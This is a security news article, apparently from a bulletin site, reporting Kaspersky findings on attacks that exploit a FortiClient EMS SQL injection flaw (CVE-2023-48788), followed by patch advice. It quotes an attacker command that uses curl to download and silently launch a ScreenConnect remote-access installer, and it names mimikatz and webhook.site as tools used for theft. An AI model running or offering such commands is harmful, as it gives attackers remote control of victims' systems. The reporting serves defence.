InfoSecBulletin Cybersecurity for mankind
Kaspersky’s Global Emergency Response Team (GERT) found that attackers are exploiting a patched SQL injection vulnerability (CVE-2023-48788) in Fortinet FortiClient EMS, affecting versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. Even with available patches, many systems remain unupdated, allowing unauthorized code execution and compromise of networks.
According to the report, The vulnerability comes from inadequate filtering of SQL input. An attacker can send crafted packets to execute unauthorized commands. It’s especially risky on Windows servers exposed to the internet, as these systems often handle vital functions like secure VPN access for employees.
B1ack’s Stash Releases 1 Million Credit Cards on a Deep Web Forum
Cisco Confirms
Salt Typhoon Exploited CVE-2018-0171 to Target U.S. Telecom Networks
AWS Key Hunter
Test this free automated tool to hunt for exposed AWS secrets
Check Point Flaw Used to Deploy ShadowPad and Ransomware
CVE-2024-12284
Citrix Issues Security Update for NetScaler Console
CISA and FBI ALERT
Ghost ransomware to breach organizations in 70 countries
Hacker chains multiple vulns to attack Palo Alto Firewall
150 Gov.t Portal affected
Black-Hat SEO Poisoning Indian “.gov.in, .ac.in” domain
CVE-2018-19410 Exposes 600 PRTG Instances in Bangladesh
Builder claims Rs 150 cr for data loss; AWS faces FIR In Bengaluru
The attack usually starts by exploiting a vulnerability to install remote monitoring tools like AnyDesk and ScreenConnect. This gives attackers a way to access the network and carry out actions like stealing credentials, moving laterally, and avoiding detection.
In October 2024, GERT analysts discovered a vulnerability being exploited when telemetry alerts showed unauthorized access to registry hives through an admin account on a compromised Windows server. Investigations found that attackers used Base64-encoded payloads and tools like curl and certutil to download malicious installers.
One significant command found in the attackers’ scripts was:
curl -o C:\update.exe “https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe” & start /B C:\update.exe & start /B C:\update.exe
The attackers showed adaptability by targeting various organizations, mainly in South America, and used platforms like webhook.site to collect data from vulnerable systems.
Key artifacts identified during the investigation included:
- Connections to external servers traced to IP addresses associated with previous malicious campaigns.
- Evidence of credential harvesting tools, such as mimikatz.exe and webbrowserpassview.exe.
- Suspicious entries in ems.log and sql_trace.log, pointing to SQL injection attempts.
GERT’s findings highlight the need to update FortiClient EMS to versions 7.0.11–7.0.13 or 7.2.3 and later.
